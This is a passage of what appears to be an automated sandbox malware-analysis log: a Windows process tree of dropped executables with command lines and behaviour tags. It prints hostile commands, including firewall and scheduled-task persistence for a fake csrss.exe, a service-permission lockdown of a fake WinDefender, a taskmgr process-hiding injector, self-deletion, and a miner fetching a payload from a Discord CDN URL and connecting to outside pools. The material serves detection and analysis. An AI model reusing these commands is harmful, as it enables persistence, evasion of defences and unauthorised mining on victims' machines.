              cmdline: "C:\Users\Admin\AppData\Local\Temp\is-RGDCL.tmp\aCVfJ427wn6CARWtL1GFkhK1.tmp" /SL5="$502CA,1807550,56832,C:\Users\Admin\Pictures\aCVfJ427wn6CARWtL1GFkhK1.exe"
              - Executes dropped EXE
              - Loads dropped DLL
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of FindShellTrayWindow
              - Suspicious use of WriteProcessMemory
              PID:21880
                C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                  cmdline: "C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -i
                  - Executes dropped EXE
                  PID:4320
                C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                  cmdline: "C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -s
                  - Executes dropped EXE
                  PID:2184
        C:\Users\Admin\Pictures\oHE5OfAE7uZo5wM5zxGSo2Yh.exe
          cmdline: "C:\Users\Admin\Pictures\oHE5OfAE7uZo5wM5zxGSo2Yh.exe"
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID:688
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -nologo -noprofile
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              PID:10796
            C:\Users\Admin\Pictures\oHE5OfAE7uZo5wM5zxGSo2Yh.exe
              cmdline: "C:\Users\Admin\Pictures\oHE5OfAE7uZo5wM5zxGSo2Yh.exe"
              - Windows security bypass
              - Executes dropped EXE
              - Windows security modification
              - Adds Run key to start application
              - Checks for VirtualBox DLLs, possible anti-VM trick
              - Drops file in Windows directory
              - Modifies data under HKEY_USERS
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of WriteProcessMemory
              PID:19500
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  cmdline: powershell -nologo -noprofile
                  - Drops file in System32 directory
                  - Modifies data under HKEY_USERS
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID:19904
                C:\Windows\System32\cmd.exe
                  cmdline: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                  PID:2496
                    C:\Windows\system32\netsh.exe
                      cmdline: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                      - Modifies Windows Firewall
                      PID:4416
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  cmdline: powershell -nologo -noprofile
                  - Drops file in System32 directory
                  - Modifies data under HKEY_USERS
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID:6152
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  cmdline: powershell -nologo -noprofile
                  - Drops file in System32 directory
                  - Modifies data under HKEY_USERS
                  - Suspicious use of AdjustPrivilegeToken
                  PID:17488
                C:\Windows\rss\csrss.exe
                  cmdline: C:\Windows\rss\csrss.exe
                  - Executes dropped EXE
                  - Adds Run key to start application
                  - Manipulates WinMonFS driver.
                  - Drops file in Windows directory
                  - Suspicious use of AdjustPrivilegeToken
                  PID:20712
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmdline: powershell -nologo -noprofile
                      - Drops file in System32 directory
                      - Modifies data under HKEY_USERS
                      - Suspicious use of AdjustPrivilegeToken
                      PID:21576
                    C:\Windows\SYSTEM32\schtasks.exe
                      cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                      - Creates scheduled task(s)
                      PID:5448
                    C:\Windows\SYSTEM32\schtasks.exe
                      cmdline: schtasks /delete /tn ScheduledUpdate /f
                      PID:12268
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmdline: powershell -nologo -noprofile
                      - Drops file in System32 directory
                      - Modifies data under HKEY_USERS
                      - Suspicious use of AdjustPrivilegeToken
                      PID:12156
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmdline: powershell -nologo -noprofile
                      - Drops file in System32 directory
                      - Modifies data under HKEY_USERS
                      - Suspicious use of AdjustPrivilegeToken
                      PID:10676
                    C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                      cmdline: C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                      - Executes dropped EXE
                      PID:22252
                    C:\Windows\SYSTEM32\schtasks.exe
                      cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                      - Creates scheduled task(s)
                      PID:21464
                    C:\Windows\windefender.exe
                      cmdline: "C:\Windows\windefender.exe"
                      - Executes dropped EXE
                      PID:21240
                        C:\Windows\SysWOW64\cmd.exe
                          cmdline: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                          PID:9936
                            C:\Windows\SysWOW64\sc.exe
                              cmdline: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                              - Launches sc.exe
                              - Suspicious use of AdjustPrivilegeToken
                              PID:9824
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmdline: powershell -nologo -noprofile
                      - Drops file in System32 directory
                      - Modifies data under HKEY_USERS
                      - Suspicious use of AdjustPrivilegeToken
                      PID:4676
                    C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                      cmdline: C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
                      - Executes dropped EXE
                      PID:6200
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmdline: powershell -nologo -noprofile
                      - Drops file in System32 directory
                      - Modifies data under HKEY_USERS
                      - Suspicious use of AdjustPrivilegeToken
                      PID:6284
                    C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                      cmdline: C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                      - Executes dropped EXE
                      PID:8040
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmdline: powershell -nologo -noprofile
                      - Drops file in System32 directory
                      - Modifies data under HKEY_USERS
                      - Suspicious use of AdjustPrivilegeToken
                      PID:8112
                    C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                      cmdline: C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                      - Executes dropped EXE
                      PID:1888
                    C:\Windows\SYSTEM32\schtasks.exe
                      cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                      - Creates scheduled task(s)
                      PID:14436
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmdline: powershell -nologo -noprofile
                      - Drops file in System32 directory
                      - Modifies data under HKEY_USERS
                      - Suspicious use of AdjustPrivilegeToken
                      PID:5148
                    C:\Windows\SYSTEM32\schtasks.exe
                      cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                      - Creates scheduled task(s)
                      PID:13948
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmdline: powershell -nologo -noprofile
                      - Drops file in System32 directory
                      - Modifies data under HKEY_USERS
                      - Suspicious use of AdjustPrivilegeToken
                      PID:9424
        C:\Users\Admin\Pictures\ItyNfie1VMw2nLT7eTugtvYL.exe
          cmdline: "C:\Users\Admin\Pictures\ItyNfie1VMw2nLT7eTugtvYL.exe"
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious use of WriteProcessMemory
          PID:3868
            C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
              cmdline: C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
              - Executes dropped EXE
              - Loads dropped DLL
              - Checks processor information in registry
              - Suspicious behavior: EnumeratesProcesses
              PID:5968
                C:\Windows\SysWOW64\cmd.exe
                  cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe"
                  PID:4320
                    C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe
                      cmdline: "C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe"
                      - Executes dropped EXE
                      - Adds Run key to start application
                      - Suspicious use of AdjustPrivilegeToken
                      PID:20248
                        C:\Windows\SysWOW64\cmd.exe
                          cmdline: "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe
                          PID:20056
                            C:\Windows\SysWOW64\PING.EXE
                              cmdline: ping 2.2.2.2 -n 1 -w 3000
                              - Runs ping.exe
                              PID:1852
            C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
              cmdline: C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
              - Executes dropped EXE
              - Suspicious use of SetWindowsHookEx
              - Suspicious use of WriteProcessMemory
              PID:9488
                C:\Windows\SysWOW64\cmd.exe
                  cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                  - Suspicious use of WriteProcessMemory
                  PID:11988
                    C:\Windows\SysWOW64\chcp.com
                      cmdline: chcp 1251
                      PID:2248
                    C:\Windows\SysWOW64\schtasks.exe
                      cmdline: schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                      - Creates scheduled task(s)
                      PID:5448
        C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe
          cmdline: "C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe" --silent --allusers=0
          - Executes dropped EXE
          - Loads dropped DLL
          - Enumerates connected drives
          - Modifies system certificate store
          - Suspicious use of WriteProcessMemory
          PID:12036
            C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe
              cmdline: C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2c0,0x2c4,0x2c8,0x29c,0x2cc,0x6db421c8,0x6db421d4,0x6db421e0
              - Executes dropped EXE
              - Loads dropped DLL
              PID:13676
            C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CkelNmqDwew6WPNzMTNOQeqx.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CkelNmqDwew6WPNzMTNOQeqx.exe" --version
              - Executes dropped EXE
              - Loads dropped DLL
              PID:14428
            C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe
              cmdline: "C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=12036 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240312130803" --session-guid=52c5fd4c-d793-4139-a592-fdb3e1102c9d --server-tracking-blob=[blob removed] --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5004000000000000
              - Executes dropped EXE
              - Loads dropped DLL
              - Enumerates connected drives
              - Suspicious use of WriteProcessMemory
              PID:14960
                C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe
                  cmdline: C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2cc,0x6d0321c8,0x6d0321d4,0x6d0321e0
                  - Executes dropped EXE
                  - Loads dropped DLL
                  PID:15204
            C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
              - Executes dropped EXE
              PID:6864
            C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\assistant_installer.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\assistant_installer.exe" --version
              - Executes dropped EXE
              - Loads dropped DLL
              PID:11556
                C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\assistant_installer.exe
                  cmdline: "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x200040,0x20004c,0x200058
                  - Executes dropped EXE
                  - Loads dropped DLL
                  PID:15312
        C:\Users\Admin\Pictures\uU0jFy7gS9hEAPMIe43bhoBX.exe
          cmdline: "C:\Users\Admin\Pictures\uU0jFy7gS9hEAPMIe43bhoBX.exe"
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          PID:10020
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -nologo -noprofile
              - Suspicious use of AdjustPrivilegeToken
              PID:9812
            C:\Users\Admin\Pictures\uU0jFy7gS9hEAPMIe43bhoBX.exe
              cmdline: "C:\Users\Admin\Pictures\uU0jFy7gS9hEAPMIe43bhoBX.exe"
              - Executes dropped EXE
              - Checks for VirtualBox DLLs, possible anti-VM trick
              PID:20496
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  cmdline: powershell -nologo -noprofile
                  - Drops file in System32 directory
                  - Modifies data under HKEY_USERS
                  - Suspicious use of AdjustPrivilegeToken
                  PID:7828
        C:\Users\Admin\Pictures\3hR8i08CkrUYFyeQRQrcPsfW.exe
          cmdline: "C:\Users\Admin\Pictures\3hR8i08CkrUYFyeQRQrcPsfW.exe"
          - Executes dropped EXE
          - Loads dropped DLL
          PID:11644
            C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
              cmdline: C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
              - Executes dropped EXE
              PID:11796
        C:\Users\Admin\Pictures\sO7J9X3BBbRMGvIrK0o2MAfH.exe
          cmdline: "C:\Users\Admin\Pictures\sO7J9X3BBbRMGvIrK0o2MAfH.exe"
          - Executes dropped EXE
          PID:13620
            C:\Users\Admin\AppData\Local\Temp\is-4J9HN.tmp\sO7J9X3BBbRMGvIrK0o2MAfH.tmp
              cmdline: "C:\Users\Admin\AppData\Local\Temp\is-4J9HN.tmp\sO7J9X3BBbRMGvIrK0o2MAfH.tmp" /SL5="$404DC,1807550,56832,C:\Users\Admin\Pictures\sO7J9X3BBbRMGvIrK0o2MAfH.exe"
              - Executes dropped EXE
              - Loads dropped DLL
              PID:13736
                C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                  cmdline: "C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -i
                  - Executes dropped EXE
                  PID:13360
                C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                  cmdline: "C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -s
                  - Executes dropped EXE
                  PID:13392
        C:\Users\Admin\Pictures\o80VeACipQO1BsWWJMh5Q0G4.exe
          cmdline: "C:\Users\Admin\Pictures\o80VeACipQO1BsWWJMh5Q0G4.exe" --silent --allusers=0
          - Executes dropped EXE
          - Loads dropped DLL
          - Enumerates connected drives
          PID:13668
            C:\Users\Admin\Pictures\o80VeACipQO1BsWWJMh5Q0G4.exe
              cmdline: C:\Users\Admin\Pictures\o80VeACipQO1BsWWJMh5Q0G4.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x69bc21c8,0x69bc21d4,0x69bc21e0
              - Executes dropped EXE
              - Loads dropped DLL
              PID:13716
            C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\o80VeACipQO1BsWWJMh5Q0G4.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\o80VeACipQO1BsWWJMh5Q0G4.exe" --version
              - Executes dropped EXE
              - Loads dropped DLL
              PID:13848
        C:\Users\Admin\Pictures\0O4uZyUrqIFSEpTeH1H0rg8K.exe
          cmdline: "C:\Users\Admin\Pictures\0O4uZyUrqIFSEpTeH1H0rg8K.exe"
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          PID:4160
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -nologo -noprofile
              - Suspicious use of AdjustPrivilegeToken
              PID:2372
            C:\Users\Admin\Pictures\0O4uZyUrqIFSEpTeH1H0rg8K.exe
              cmdline: "C:\Users\Admin\Pictures\0O4uZyUrqIFSEpTeH1H0rg8K.exe"
              - Executes dropped EXE
              - Checks for VirtualBox DLLs, possible anti-VM trick
              - Modifies data under HKEY_USERS
              PID:6012
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  cmdline: powershell -nologo -noprofile
                  - Drops file in System32 directory
                  - Modifies data under HKEY_USERS
                  - Suspicious use of AdjustPrivilegeToken
                  PID:5240
        C:\Users\Admin\Pictures\bhJRGCgBFLmbnysHYxZIy2UZ.exe
          cmdline: "C:\Users\Admin\Pictures\bhJRGCgBFLmbnysHYxZIy2UZ.exe"
          - Executes dropped EXE
          PID:4700
            C:\Users\Admin\AppData\Local\Temp\is-QR3BA.tmp\bhJRGCgBFLmbnysHYxZIy2UZ.tmp
              cmdline: "C:\Users\Admin\AppData\Local\Temp\is-QR3BA.tmp\bhJRGCgBFLmbnysHYxZIy2UZ.tmp" /SL5="$704E8,1807550,56832,C:\Users\Admin\Pictures\bhJRGCgBFLmbnysHYxZIy2UZ.exe"
              - Executes dropped EXE
              - Loads dropped DLL
              PID:2780
                C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                  cmdline: "C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -i
                  - Executes dropped EXE
                  PID:12044
                C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                  cmdline: "C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -s
                  - Executes dropped EXE
                  PID:12612
        C:\Users\Admin\Pictures\kL5MaQu7jAAGIFgNQb6ujSPo.exe
          cmdline: "C:\Users\Admin\Pictures\kL5MaQu7jAAGIFgNQb6ujSPo.exe"
          - Executes dropped EXE
          - Loads dropped DLL
          PID:5892
            C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
              cmdline: C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
              - Executes dropped EXE
              PID:1284
            C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
              cmdline: C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
              - Executes dropped EXE
              - Suspicious use of SetWindowsHookEx
              PID:11600
                C:\Windows\SysWOW64\cmd.exe
                  cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                  PID:11752
                    C:\Windows\SysWOW64\chcp.com
                      cmdline: chcp 1251
                      PID:11812
                    C:\Windows\SysWOW64\schtasks.exe
                      cmdline: schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                      - Creates scheduled task(s)
                      PID:2552
        C:\Users\Admin\Pictures\RAus8SFt5ecM23w4L2GQk0YC.exe
          cmdline: "C:\Users\Admin\Pictures\RAus8SFt5ecM23w4L2GQk0YC.exe" --silent --allusers=0
          - Executes dropped EXE
          - Loads dropped DLL
          - Enumerates connected drives
          PID:7892
            C:\Users\Admin\Pictures\RAus8SFt5ecM23w4L2GQk0YC.exe
              cmdline: C:\Users\Admin\Pictures\RAus8SFt5ecM23w4L2GQk0YC.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x690a21c8,0x690a21d4,0x690a21e0
              - Executes dropped EXE
              - Loads dropped DLL
              PID:7944
            C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\RAus8SFt5ecM23w4L2GQk0YC.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\RAus8SFt5ecM23w4L2GQk0YC.exe" --version
              - Executes dropped EXE
              - Loads dropped DLL
              PID:6392
C:\Windows\system32\taskmgr.exe (tree depth 1)
Command line: "C:\Windows\system32\taskmgr.exe" /4
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:17004

C:\Windows\system32\taskmgr.exe (tree depth 2)
Command line: "C:\Windows\system32\taskmgr.exe" /1
- Loads dropped DLL
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:22124
C:\Windows\windefender.exe (tree depth 1)
Command line: C:\Windows\windefender.exe
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:9960

C:\Windows\System32\rundll32.exe (tree depth 1)
Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
PID:16432

C:\Windows\system32\svchost.exe (tree depth 1)
Command line: C:\Windows\system32\svchost.exe -k SDRSVC
- Suspicious use of AdjustPrivilegeToken
PID:6264
C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe (tree depth 1)
Command line: "C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe"
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:20592

C:\Windows\SysWOW64\cmd.exe (tree depth 2)
Command line: "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe
PID:19836

C:\Windows\SysWOW64\PING.EXE (tree depth 3)
Command line: ping 2.2.2.2 -n 1 -w 3000
- Runs ping.exe
PID:20644
C:\Windows\system32\OpenWith.exe (tree depth 1)
Command line: C:\Windows\system32\OpenWith.exe -Embedding
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:21000

C:\Windows\system32\NOTEPAD.EXE (tree depth 1)
Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\file.txt
- Opens file in notepad (likely ransom note)
PID:16572
C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 1)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe"
PID:22236

C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 2)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe"
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:22132

C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 3)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.0.761458766\1283516238" -parentBuildID 20221007134813 -prefsHandle 1724 -prefMapHandle 1716 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7fe25fe2-29bf-4f18-909f-bb0ad5413023} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 1816 18b58bd6a58 gpu
PID:22476

C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 3)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.1.1119650118\363977459" -parentBuildID 20221007134813 -prefsHandle 2140 -prefMapHandle 2128 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5885d735-ae73-4ce5-b95e-2748595eeffd} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 2164 18b58737258 socket
PID:9748

C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 3)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.2.2080356938\1498724895" -childID 1 -isForBrowser -prefsHandle 2892 -prefMapHandle 2888 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {790d56b0-7042-4de1-9b0f-db29a74875b1} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 2904 18b5ce97b58 tab
PID:10656

C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 3)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.3.1650669351\208864390" -childID 2 -isForBrowser -prefsHandle 3256 -prefMapHandle 3252 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {64b429e0-f1bf-44cc-8544-5a4baaad3f76} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 996 18b46862558 tab
PID:4820

C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 3)
